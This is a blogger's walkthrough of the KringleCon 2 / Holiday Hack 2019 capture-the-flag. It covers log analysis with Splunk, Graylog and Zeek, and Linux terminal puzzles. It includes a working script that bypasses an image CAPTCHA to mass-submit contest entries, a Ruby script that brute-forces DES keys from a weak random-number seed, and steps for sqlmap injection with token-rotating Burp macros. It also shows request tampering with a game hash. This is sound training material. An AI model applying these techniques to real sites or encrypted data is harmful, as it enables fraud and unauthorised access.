Kringlecon 2: Turtle Doves

[ ctf  challenges  ]

Intro

Location: Train Station

Initial Dialog - Santa:

Welcome to the North Pole and KringleCon 2! Last year, KringleCon hosted over 17,500 attendees and my castle got a little crowded. We moved the event to Elf University (Elf U for short), the North Pole’s largest venue. Please feel free to explore, watch talks, and enjoy the con!


alt text

Console - Escape Ed

Location: Train Station

Initial Dialog - Bushy Evergreen:

Hi, I’m Bushy Evergreen. Welcome to Elf U! I’m glad you’re here. I’m the target of a terrible trick. Pepper Minstix is at it again, sticking me in a text editor. Pepper is forcing me to learn ed. Even the hint is ugly. Why can’t I just use Gedit? Please help me just quit the grinchy thing.


alt text

Technical:

Tried Ctrl-C and Ctrl-Z, but did not work
Entering ‘q’ and select enter worked :)

alt text

Completed Dialog - Bushy Evergreen:

Wow, that was much easier than I’d thought. Maybe I don’t need a clunky GUI after all! Have you taken a look at the password spray attack artifacts? I’ll bet that DeepBlueCLI tool is helpful. You can check it out on GitHub. It was written by that Eric Conrad. He lives in Maine - not too far from here!

Objective 0 - Talk To Santa

Enter the campus quad and talk to Santa

Location: The Quad


alt text

alt text

Completed Dialog - Santa:

This is a little embarrassing, but I need your help. Our KringleCon turtle dove mascots are missing! They probably just wandered off. Can you please help find them? To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your badge. Where’s your badge? Oh! It’s that big, circle emblem on your chest - give it a tap! We made them in two flavors - one for our new guests, and one for those who’ve attended both KringleCons. After you find the Turtle Doves and complete objectives 2-5, please come back and let me know. Not sure where to start? Try hopping around campus and talking to some elves. If you help my elves with some quicker problems, they’ll probably remember clues for the objectives.

Objective 1 - Find the Turtle Doves

Find the missing turtle doves

Location: Student Union


alt text

Completed Dialog - Santa:

Thank you for finding Jane and Michael, our two turtle doves! I’ve got an uneasy feeling about how they disappeared. Turtle doves wouldn’t wander off like that. Someone must have stolen them! Please help us find the thief! It’s a moral imperative! I think you should look for an entrance to the steam tunnels and solve Challenge 6 and 7 too! Gosh, I can’t help but think: Winds in the East, snow coming in… Like something is brewing and about to begin! Can’t put my finger on what lies in store, But I fear what’s to happen all happened before!


alt text

Objective 2 - Unredact Threatening Document

Someone sent a threatening letter to Elf University. What is the first word in ALL CAPS in the subject line of the letter? Please find the letter in the Quad.

Location: The Quad

Technical:

Open the document in PDF viewer in Linux
Select the redacted words and you are able to view
All capitalized word is DEMAND


alt text

Console - Smart Braces

Location: Student Union

Initial Dialog - Kent Tinseltooth:

OK, this is starting to freak me out! Oh sorry, I’m Kent Tinseltooth. My Smart Braces are acting up. Do… Do you ever get the feeling you can hear things? Like, voices? I know, I sound crazy, but ever since I got these… Oh! OK, this is starting to freak me out! Oh sorry, I’m Kent Tinseltooth. My Smart Braces are acting up. Do… Do you ever get the feeling you can hear things? Like, voices? I know, I sound crazy, but ever since I got these… Oh! Do you think you could take a look at my Smart Braces terminal? I’ll bet you can keep other students out of my head, so to speak. It might just take a bit of Iptables work.

alt text

Technical:

After letting the dialog play through we are told of a file to review
alt text
Viewing the file we are told to enter a set amount of iptables rules
alt text
As we know these are pvivileged commands, we check sudo and see we can enter the commands using sudo no password
alt text
After entering the rules we wait until the rules are checked by Kent
alt text

Completed Dialog - Kent Tinseltooth:

Oh thank you! It’s so nice to be back in my own head again. Er, alone. By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks. There are funny rhymes, references to perspective, and odd mentions of eggs! And if you think the stuff in your browser looks strange, you should see the page source… Special tools? No, I don’t think you’ll need any extra tooling for those locks. BUT - I’m pretty sure you’ll need to use Chrome’s developer tools for that one. Or sorry, you’re a Firefox fan? Yeah, Safari’s fine too - I just have an ineffible hunger for a physical Esc key. Edge? That’s cool. Hm? No no, I was thinking of an unrelated thing. Curl fan? Right on! Just remember: the Windows one doesn’t like double quotes. Old school, huh? Oh sure - I’ve got what you need right here…


alt text

Console - Linux Path

Location: Hermey Hall

Initial Dialog - SugarPlum Mary

Oh me oh my - I need some help! I need to review some files in my Linux terminal, but I can’t get a file listing. I know the command is ls, but it’s really acting up. Do you think you could help me out? As you work on this, think about these questions: Do the words in green have special significance? How can I find a file with a specific name? What happens if there are multiple executables with the same name in my $PATH? … Oh me oh my - I need some help! I need to review some files in my Linux terminal, but I can’t get a file listing.

alt text

Technical:

There are lots of hints highlighted in green to find the correct ls
alt text
Simply entering ‘ls’ doesn’t work. We assume the usual location of the command and enter ‘/bin/ls’ and we can print the directory
alt text
We read the file ‘rejected-elfu-logos.txt’
alt text
Bonus: If we look at hidden files using ‘/bin/ls -alh’ we find ‘.elfscream.txt’
alt text
alt text

Completed Dialog - SugarPlum Mary

Oh there they are! Now I can delete them. Thanks! Have you tried the Sysmon and EQL challenge? If you aren’t familiar with Sysmon, Carlos Perez has some great info about it. Haven’t heard of the Event Query Language? Check out some of Ross Wolf’s work on EQL or that blog post by Josh Wright in your badge.

Console - Nyanshell

Location: Speaker UNpreparedness Room

Initial Dialog - Alabaster Snowball

Welcome to the Speaker UNpreparedness Room! My name’s Alabaster Snowball and I could use a hand. I’m trying to log into this terminal, but something’s gone horribly wrong. Every time I try to log in, I get accosted with … a hatted cat and a toaster pastry? I thought my shell was Bash, not flying feline. When I try to overwrite it with something else, I get permission errors. Have you heard any chatter about immutable files? And what is sudo -l telling me? Who would do such a thing?? Well, it IS a good looking cat. Have you heard about the Frido Sleigh contest? There are some serious prizes up for grabs. The content is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter. I heard there was a talk at KCII about using machine learning to defeat challenges like this. I don’t think anything could ever beat an elf though!

alt text alt text

Technical:

We know we can ‘su’ as alabaster_snowball as we have the password
alt text
Doing so presents us with a forever running/flying magical nyan cat
alt text
We check if we can do anything with a priviledges with ‘sudo -l’
alt text
We lookup what chattr does and find we can change file attributes…hmmm
Looking around we find an interesting file ‘entrypoint.sh’ at top of file system
alt text
Inspection of the file shows ‘/bin/nsh’ cannot be changed due to chattr made it immuntable ‘+i’
We verify this using the command ‘lsattr’ on ‘/bin/nsh’
alt text
So let’s make it so we can make changes with ‘-i’
alt text
chattr only allows to append to a file and that’s not gonna work, but if we look at the permissions we see we can write to the file :)
alt text
We simple cat out bash and overwrite the file and then su as alabaster_snowball
alt text

Objective 3 - Windows Log Analysis: Evaluate Attack Outcome

We’re seeing attacks against the Elf U domain! Using the event log data, identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.

DeepBlueCLI Powershell Script

Technical:

After downloading/extracting files we check out the post by Eric Conrad
While there might have been another way of doing this objective, I simply used the tool to export to CSV
alt text
Then opened the file in Notepad++ and we see towards the end a whole bunch of Total Logon Failures 77
Since we know it’s a Password Spray attack and an account was compromised it stands that that account would be one less than 77 :)
alt text
With that ‘supatree’ account is the one that was compromised
alt text

Objective 4 - Windows Log Analysis: Determine Attacker Technique

Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.

EQL Post

Technical:

After downloading/extrating the file we look at the post on SANS blog
If you actually read the post it tells you the tool used ‘ntdsutil’
alt text
shrugs
Answer is ‘ntdsutil’
alt text

Console - Xmas Cheer Laser

Location: Hermey Hall / Laboratory

Initial Dialog - Sparkle Redberry

I’m Sparkle Redberry and Imma chargin’ my laser! Problem is: the settings are off. Do you know any PowerShell? It’d be GREAT if you could hop in and recalibrate this thing. It spreads holiday cheer across the Earth … … when it’s working! … I’m Sparkle Redberry and Imma chargin’ my laser! I’m Sparkle Redberry and Imma chargin’ my laser! Problem is: the settings are off.

alt text

Technical:

We’re given a PowerShell console and using the Web API we need to get the laser to output 5 Mega-Jollies per liter and the settings are hidden in various places
alt text
We see how to work the laser by invoking the command shown on welcome screen
alt text
The file listed in the welcome message hints to looking at the history so we invoke history using ‘Get-History | fl’
alt text
We find the angle value and another hint that suggests to look at system environment variables
alt text
Viewing the variables with command below and then formated, we get another hint to recursively search on LastWriteTime in ‘/etc’
alt text
alt text
Using ‘Get-ChildItem -R | sort LastWriteTime’ we find the file ‘archive’ located in ‘/etc/apt’
alt text
We’ll need to expand this so we’ll do it in ‘/tmp’, but we’ll create a new directory using ‘new-item -itemtype directory /tmp/bz’ so the files aren’t mixed with others

Then we extract the file to this new directory using ‘Expand-Archive -path /etc/apt/archive -DestinationPath /tmp/bz’
alt text
Doing so we find a new directory called ‘refraction’ with two new files
alt text
The ‘runme.elf’ file needs to be executable and then we can run giving us the refraction value
alt text
If we view the ‘riddle’ file we we’re given an MD5 hash that is a hash of a file in ‘/home/elf’
alt text
We find the new file and the contents reveals the temperature value
alt text
Next hint is to recursievly search through ‘/home/elf/depths’ and thousands of txt files. We can do this using ‘Get-ChildItem -Recurse ./depths/ -filter *.txt | % { $_.FullName } | Sort-Object -Property length’

This gives use a very long path to a randome txt file and viewing it gives us another hint
alt text
alt text
We need to kill off specific process that are owned by different users in order listed.
We first gather that information, kill them off one by one and then we can view contents of ‘/shall/see’ alt text
Next hint is to find an event log with xml extension in ‘/etc’
alt text
Then we need to find the unique ID. This one took a little bit to figure out, but I found that ID 1800 is used twice out of all the other IDs
alt text
We then look at the properties of the event and if we look closely, we find the values for the gases
alt text
alt text
So now we put it all together
1. Turn off Laser
alt text
2. Update refraction, temperature, and angle values
alt text
3. Update the gases
alt text
4. Turn on Laser
alt text
5. Check
alt text

Completed Dialog - Sparkle Redberry

You got it - three cheers for cheer! For objective 5, have you taken a look at our Zeek logs? Something’s gone wrong. But I hear someone named Rita can help us. Can you and she figure out what happened?

Objective 5 - Network Log Analysis: Determine Compromised System

The attacks don’t stop! Can you help identify the IP address of the malware-infected system using these Zeek Logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.

Technical

After downloading/extracting files, we find a lot of logs however we see there is an interface using RITA
alt text
Looking at options available we see ‘Long Connections’ which is a good indication of malware
alt text
Using first IP 192.168.134.130 from this list we complete the objective
alt text

Objective 6 - Splunk

Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.

Intial Dialog - Professor Banas

Hi, I’m Dr. Banas, professor of Cheerology at Elf University. This term, I’m teaching “HOL 404: The Search for Holiday Cheer in Popular Culture,” and I’ve had quite a shock! I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC. Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP! If I don’t, he will have to report the incident to the boss of the SOC. Apparently, I can find out more information from this website https://splunk.elfu.org/ with the username: elf / Password: elfsocks. I don’t know anything about computer security. Can you please help me?

alt text

Technical:

After logging in we are greeted with a welcome message with general guidance
alt text
alt text
Question 1: What is the short host name of Professor Banas’ computer?

Answer 1: sweetums

We do a quick query all and find their is only one field name ‘ComputerName’
alt text

Question 2: What is the name of the sensitive file that was likely accessed and copied by the attacker? Please provide the fully qualified location of the file. (Example: C:\temp\report.pdf)

Answer 2: ‘C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt’

The helpful chats indicate the professor was close with Santa. So we do a query all plus ‘santa’ and find a file that could be of importance :)
alt text

Question 3: What is the fully-qualified domain name(FQDN) of the command and control(C2) server? (Example: badguy.baddies.com)

Answer 3: ‘144.202.46.214.vultr.com’

The helpful chat suggests to look at the additional fields after the query. Looking there is only one DestinationHostname
alt text

Question 4: What document is involved with launching the malicious PowerShell code? Please provide just the filename. (Example: results.txt)

Answer 4: 19th Century Holiday Cheer Assignment.docm

Hint is in the questions of what “document” and so we do a wildcard search for known document extensions and find a suspicious macro one
alt text

Question 5: How many unique email addresses were used to send Holiday Cheer essays to Professor Banas? Please provide the numeric value. (Example: 1)

Answer 5: 21

Informed how to search on stoQ and given the Subject, we’re able to pull stats based on that information and various fields to get the number
alt text

Question 6: What was the password for the zip archive that contained the suspicious file?

Answer: 6: 123456789

Since we know the file name we search for it and then look at the SMTP body for the answer
alt text
alt text

Question 7: What email address did the suspicious file come from?

Answer 7: Bradly.Buttercups@eIfu.org

Using the same query we look at the SMTP From field
alt text

Challenge Question: What was the message for Kent that the adversary embedded in this attack?

Challenge Answer: Kent you are so unfair. And we were going to make you the king of the Winter Carnival.

Getting some direction from the helpful chat there we start with what we already know, the email from Bradly Buttercups
alt text

We then add to our search by the recommended hint. We see the .docm file listed at ‘/home/ubuntu/archive/c/6/e/1/7/c6e175f5b8048c771b3a3fac5f3295d2032524af/19th Century Holiday Cheer Assignment.docm’
alt text

Using the File Archive, we browse to this file and download. Viewing the file we’re told to look at core.xml. alt text
alt text

We find this file at ‘/home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4/core.xml’
alt text

And we complete the objective
alt text
alt text

Completed Dialog - Professor Banas

Oh, thanks so much for your help! Sorry I was freaking out. I’ve got to talk to Kent about using my email again… …and picking up my dry cleaning.

Console - Mongo Pilfer

Location: Hermey Hall / NetWars

Initial Dialog - Holly Evergreen

Hey! It’s me, Holly Evergreen! My teacher has been locked out of the quiz database and can’t remember the right solution. Without access to the answer, none of our quizzes will get graded. Can we help get back in to find that solution? I tried lsof -i, but that tool doesn’t seem to be installed. I think there’s a tool like ps that’ll help too. What are the flags I need? Either way, you’ll need to know a teensy bit of Mongo once you’re in. Pretty please find us the solution to the quiz!

alt text

Technical

Trying to connect to the Mongo DB using ‘mongo’ gives us an error stating it’s not running on default port
alt text
Using netstat we find the port and connect
alt text
Looking at the collections we see redherring and of course there’s nothing there
alt text
Let’s look at the DBs, switch to elfu and then show the collections
alt text
And ‘solution’ looks like the right one :)
alt text
From there we just need to run the command between the asterisks
alt text
We get a congratultions
alt text

Completed Dialog - Holly Evergreen

Woohoo! Fantabulous! I’ll be the coolest elf in class. On a completely unrelated note, digital rights management can bring a hacking elf down. That ElfScrow one can really be a hassle. It’s a good thing Ron Bowes is giving a talk on reverse engineering! That guy knows how to rip a thing apart. It’s like he breathes opcodes!

Console - Frosty Keypad

Location: The Quad

Initial Dialog - Tangle Coalbox

Hey kid, it’s me, Tangle Coalbox. I’m sleuthing again, and I could use your help. Ya see, this here number lock’s been popped by someone. I think I know who, but it’d sure be great if you could open this up for me. I’ve got a few clues for you. One digit is repeated once. The code is a prime number. You can probably tell by looking at the keypad which buttons are used.

alt text

Technical

Looking at the key pad we know 1, 3 and 7 are used
alt text
On a whim, we try 1337 and doesn’t work
Multiple ways of doing this including Python to check prime numbers, etc, etc. Tried reversing the code to 7331 and it worked :)
alt text
alt text
shrugs

Completed Dialog - Tangle Coalbox

Yep, that’s it. Thanks for the assist, gumshoe. Hey, if you think you can help with another problem, Prof. Banas could use a hand too. Head west to the other side of the quad into Hermey Hall and find him in the Laboratory.

Console - Graylog

Location: Dorm

Initial Dialog - Pepper Minstix

It’s me - Pepper Minstix. Normally I’m jollier, but this Graylog has me a bit mystified. Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala. Some Elf U computers were hacked, and I’ve been tasked with performing incident response. Can you help me fill out the incident response report using our instance of Graylog? It’s probably helpful if you know a few things about Graylog. Event IDs and Sysmon are important too. Have you spent time with those? Don’t worry - I’m sure you can figure this all out for me! Click on the All messages Link to access the Graylog search interface! Make sure you are searching in all messages! The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner. Login with the username elfustudent and password elfustudent.

alt text

Technical

Credentials elfustudent:elfustudent
Link on how to query Graylog
In the lower right-hand corner are 10 questions that need to be answered by searching through the logs

alt text
alt text
alt text
alt text
alt text
alt text
alt text
alt text
alt text
alt text

Completed
alt text

Completed Dialog - Pepper Minstix

That’s it - hooray! Have you had any luck retrieving scraps of paper from the Elf U server? You might want to look into SQL injection techniques. OWASP is always a good resource for web attacks. For blind SQLi, I’ve heard Sqlmap is a great tool. In certain circumstances though, you need custom tamper scripts to get things going!

Console - Holiday Hack Trail

Location: Dorm

Initial Dialog - Minty Candycane

Hi! I’m Minty Candycane! I just LOVE this old game! I found it on a 5 1/4” floppy in the attic. You should give it a go! If you get stuck at all, check out this year’s talks. One is about web application penetration testing. Good luck, and don’t get dysentery!

alt text
alt text

Technical

Easy:
1. buy any amount and go 8000 distance without dying
alt text
2. notice parameters are in url
alt text
4. change to 8000 distance and select arrow
alt text
5. distance now shows 0
alt text
6. select go and win
alt text

Medium:
1. buy whatever and go 8000 distance without dying
2. notice there are no parameters in url now
alt text
3. select intercept on burp, select go on gam, switch to burp to see request
alt text
4. on intercept change distance to 8000 and forward request
alt text
5. win game
alt text

Hard:
1. buy any amount and go 8000 distance without dying
2. so now there is nothing in url and simply changing parameter in burp fails and gives bad hash error
alt text
alt text
3. looking closer we see that medium challenge had “HASH” as the param value, this challenge has an actual hash
alt text
4. looking even closer this hash changes each time
5. we throw the hash at crackstation and there is a find
alt text
6. we go back and watch trailhead video https://www.youtube.com/watch?v=0T6-DQtzCgM
7. so we try again and get hash 08d98638c6fcd194a4b1e6992063e944 which equals 682 and then d4c2e4a3297fe25a71d030b67eb83bfc which equals 728. results keep going up…
alt text
8. after some time i started subtracting numbers from all the values in the post request. turns out if you add up the parameters below, they equal the number given from the hash
alt text
9. so starting over, we grab the new hash and value (585)
alt text
10. just need update the distance to 7999 add to previous value and generate the new hash
alt text
11. we update burp with the two new values
alt text
12. select go and win
alt text

Some calculations from burp request:

money=450 distance=164 curmonth=9 curday=4 reindeer=3 runners=4 ammo=12 meds=4 food=78 total=728 hash=d4c2e4a3297fe25a71d030b67eb83bfc

Completed Dialog - Minty Candycane

You made it - congrats! Have you played with the key grinder in my room? Check it out! It turns out: if you have a good image of a key, you can physically copy it. Maybe you’ll see someone hopping around with a key here on campus. Sometimes you can find it in the Network tab of the browser console. Deviant has a great talk on it at this year’s Con. He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale.

Objective 7 - Get Access To The Steam Tunnels

Gain access to the steam tunnels. Who took the turtle doves? Please tell us their first and last name. For hints on achieving this objective, please visit Minty’s dorm room and talk with Minty Candy Cane.

Location: Dorm

Technical:

When entering the room an individual runs off to a room and behind a locked door. So the first part of objective 7 seems like we must create a key using the ginder that will fit the lock.

Now to do this I left the room and returned. The person appeared again, but before they left I quickly grabbed a screenshot.

This provide helpful as this person is wearing a key.
alt text
So my process was to enlarge that screenshot and rotate so that I could cut a key that would match.
alt text
Turns out it worked and the magic number/cut is 122520 and door opens.
alt text
alt text
Once we enter we are in the steam tunnels and there is the person that ran off, Krampus Hollyfeld.
After talking with him, he states he is the person that borrowed the two turtle doves.
Objective 7 completed.
alt text

Objective 8 - Bypassing the Frido Sleigh CAPTEHA

Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.

Location: Steam Tunnels

Initial Dialog - Krampus Hollyfeld

Hello there! I’m Krampus Hollyfeld. I maintain the steam tunnels underneath Elf U, Keeping all the elves warm and jolly. Though I spend my time in the tunnels and smoke, In this whole wide world, there’s no happier bloke! Yes, I borrowed Santa’s turtle doves for just a bit. Someone left some scraps of paper near that fireplace, which is a big fire hazard. I sent the turtle doves to fetch the paper scraps. But, before I can tell you more, I need to know that I can trust you. Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I’ll know I can trust you. The contest is here on my screen and at fridosleigh.com. No purchase necessary, enter as often as you want, so I am! They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs. Unfortunately, it’s restricted to elves only, and I can’t bypass the CAPTEHA. (That’s Completely Automated Public Turing test to tell Elves and Humans Apart.) I’ve already cataloged 12,000 images and decoded the API interface. Can you help me bypass the CAPTEHA and submit lots of entries?

alt text

Technical

Watch talk by Chris Davis on Machine Learning
First Download images and use the ‘retrain.py’ script that can be found here
Once images are trained we update the ‘predict_images_using_trained_model.py’ script that can be found here
Once we have that working and it properly recognizes the images correct, we need to apply that same logic to the challenge

The script is basically using an api call to download base64 encoded images and their UUIDs, 100 of them to be exact
Without having to explain this too thoroughly, we basically need to do the following by updating our script:
1. download those base64 images and decode them
2. save them to file with the UUID names
3. then use the predict images script to identify the images and beat the capteha

updated code below

After we get that working we update the script with our real email address and wait
Running the script will submit a lot of entries
alt text

From there we get an email confirmation that it worked :)
alt text

Updated Code: final_capteha_api.py

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import base64
import os
import shutil
import glob

def main():
    yourREALemailAddress = "YourRealEmail@SomeRealEmailDomain.RealTLD"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

	# begin custom...err junk code;
    hhimgs = ([img['base64'] for img in b64_images])
    hhuuids = ([img['uuid'] for img in b64_images])
    for index, (item1, item2) in enumerate(zip(hhimgs, hhuuids)):
        filename = '{}.txt'.format(item2)
        with open(filename, 'w') as f_out:
            f_out.write('{}\n'.format(item1))

    for index, (item1, item2) in enumerate(zip(hhimgs, hhuuids)):
        filename = '{}.txt'.format(item2)
        filename2 = '{}.png'.format(item2)
        with open(filename, 'rb') as fr_out:
            with open(filename2, 'wb') as fw_out:
                fw_out.write(base64.b64decode(fr_out.read()))

    source = '/home/bz/'
    dest = '/home/bz/unknown_images'

    files = glob.iglob(os.path.join(source, "*.png"))
    txtfiles = glob.iglob(os.path.join(source, "*.txt"))

    for file in files:
        shutil.move(file, dest)

    os.system('/home/bz/predict_images_using_trained_model.py')
    var = []
    for i in challenge_image_types:
        if i == "Stockings":
            j = os.listdir(i)
            x1 = ','.join([x.split('.')[0] for x in j])
            var.append(x1)
        elif i == "Presents":
            k = os.listdir(i)
            x2 = ','.join([x.split('.')[0] for x in k])
            var.append(x2)
        elif i == "Ornaments":
            l = os.listdir(i)
            x3 = ','.join([x.split('.')[0] for x in l])
            var.append(x3)
        elif i == "Christmas Trees":
            m = os.listdir(i)
            x4 = ','.join([x.split('.')[0] for x in m])
            var.append(x4)
        elif i == "Candy Canes":
            n = os.listdir(i)
            x5 = ','.join([x.split('.')[0] for x in n])
            var.append(x5)
        elif i == "Santa Hats":
            o = os.listdir(i)
            x6 = ','.join([x.split('.')[0] for x in o])
            var.append(x6)
        else:
            break

    for file in txtfiles:
        os.remove(file)

    final_answer = ','.join(var)
	
	# end the horrible code already;
	
    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    # final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
		# replace this with real email
        'email':'real.email.here',
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed.
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)


if __name__ == "__main__":
    main()

Completed Dialog (Krampus Hollyfeld):

You did it! Thank you so much. I can trust you! To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels. As for those scraps of paper, I scanned those and put the images on my server. I then threw the paper away. Unfortunately, I managed to lock out my account on the server. Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans? I give you permission to hack into it, solving Objective 9 in your badge. And, as long as you’re traveling around, be sure to solve any other challenges you happen across.

alt text

Objective 9 - Retrieve Scraps of Paper from Server

Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.

Initial Dialog

See dialog with Pepper Minstix after completing Graylog Console Challenge

Technical

The portal is simply a way to register through a POST request against /application-request.php. We can then check our status using the /application-check.php, but it’s a GET request. In this request we can see that we pass the email we used to registered with and a Token. After further inspection we can see this token is coming from /validator.php

We know we need to use sqlmap, but either through the GET or POST request. So we need to figure out how to change the token each time. This was easy by setting up a macro in Burp
alt text
alt text
alt text

Then we use that macro in a session
alt text
alt text

After that we run sqlmap through burp. We also need to use a tamper script and against the GET request against /application-check.php (as POST didn’t work)
alt text
alt text

From there we get the scraps of paper
alt text
alt text
alt text
alt text
alt text
alt text

Going through these we make out the answer to be Super Sled-o-matic
alt text

Objective 10 - Recover Cleartext Document

The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can’t send you the source, but we do have debug symbols that you can use. Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. What is the middle line on the cover page? (Hint: it’s five words) For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.

Initial Dialog - Holly Evergreen

See dialog from Mongo Pilfer

Additional Dialog - Kramus Hollyfeld

Wow! We’ve uncovered quite a nasty plot to destroy the holiday season. We’ve gotta stop whomever is behind it! I managed to find this protected document on one of the compromised machines in our environment. I think our attacker was in the process of exfiltrating it. I’m convinced that it is somehow associated with the plan to destroy the holidays. Can you decrypt it? There are some smart people in the NetWars challenge room who may be able to help us.

Technical

Watch video from Ron Bowes on Reverse Crypto and download all the files

Running the .exe we see we can encrypt and decrypt files. Also our key is pushed to the elfscrow server.
alt text

alt text

alt text
Looking the .exe combined with the symbols .pdb file in IDA, we first need to determine how the key is being generated.
We determine that it’s the Microsoft formula for LCG based on the follow
alt text
From there we see if we’re able to generate the same key based on the provided seed and formula. Success!
alt text
Next we determine the seed is based on (epoch](https://www.epochconverter.com/) and we know the range of date/time the encrypted file was created

Knowing how to generate the key and a range of seed allows us to write a script to loop through and test decryption

Now the below code will loop through 7200 times creating equal amount of files

Decrypt code - decrypt.rb

require 'openssl'

KEY_LENGTH = 8 

def generate_key(seed)
  key = ""
  1.upto(KEY_LENGTH) do
    key += (((seed = (214013 * seed + 2531011) & 0x7fff_ffff) >> 16) & 0x0FF).chr
    end
  return key
end


def decrypt(data, key)
  c = OpenSSL::Cipher::DES.new('CBC') 
  c.decrypt
  c.key = key
  return (c.update(data) + c.final())
end

j = 0
i = 1575666001
while i > 1575658800
   i -= 1
   key = generate_key(i)
   begin
      File.open("#{i}.pdf","wb") do |outf|
        data = File.read("ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc")
        outf.write(decrypt(data, key))
   rescue; end
   end
end

Upon sorting through the files, majority of them are zero bytes however there are a few with data
After some looking we find 1575663650.pdf is our winner
alt text

Answer is “Machine Learning Sleigh Route Finder”

alt text

Objective 11 - Open the Sleigh Shop Door

Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny? For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.

Location: Student Union

Initial Dialog - Shinny Upatree

Psst - hey! I’m Shinny Upatree, and I know what’s going on! Yeah, that’s right - guarding the sleigh shop has made me privvy to some serious, high-level intel. In fact, I know WHO is causing all the trouble. Cindy? Oh no no, not that who. And stop guessing - you’ll never figure it out. The only way you could would be if you could break into my crate, here. You see, I’ve written the villain’s name down on a piece of paper and hidden it away securely!

alt text

Additional Dialog - Kent Tinseltooth

See dialog with Kent Tinseltooth after completing Smart Braces Console Challenge

Technical

Using Google Chrome Inspect - Dev Tools
alt text
found in console area
alt text

alt text
found if print preview page
alt text

alt text
found if refreshed network page and look at loaded files
alt text
alt text

alt text
found in local storage
alt text

alt text
found in title in dom tree
alt text

alt text
find perspective value and decrease to nothing
alt text

alt text
find font-family
alt text

alt text
find in event listener eggs
alt text

alt text
find chakra code and active each one
alt text

alt text
find images loaded and you’ll see an inside image that shows a circuit board and the code
alt text
entering gives a macaroni error?!? alt text
to complete the rest we need to find 3 elements; macaroni, swab and gnome using Ctrl-F to search
alt text
then move them after the button switch
alt text
after that, the lock works and you finish

We get the villian’s name
alt text

Completed Dialog - Shinny Upatree

Wha - what?? You got into my crate?! Well that’s embarrassing… But you know what? Hmm… If you’re good enough to crack MY security… Do you think you could bring this all to a grand conclusion? Please go into the sleigh shop and see if you can finish this off! Stop the Tooth Fairy from ruining Santa’s sleigh route!

alt text

Console - Zeek JSON Analysis

Location - Sleigh Shop

Initial Dialog - Wunorse Openslae

Wunorse Openslae here, just looking at some Zeek logs. I’m pretty sure one of these connections is a malicious C2 channel… Do you think you could take a look? I hear a lot of C2 channels have very long connection times. Please use jq to find the longest connection in this data set. We have to kick out any and all grinchy activity!

Zeek Post
alt text

Technical

Read the post from above and looked to see what file was on console
alt text
Run same command that was in post to find answer 13.107.21.200
alt text

Completed Dialog - Wunorse Openslae

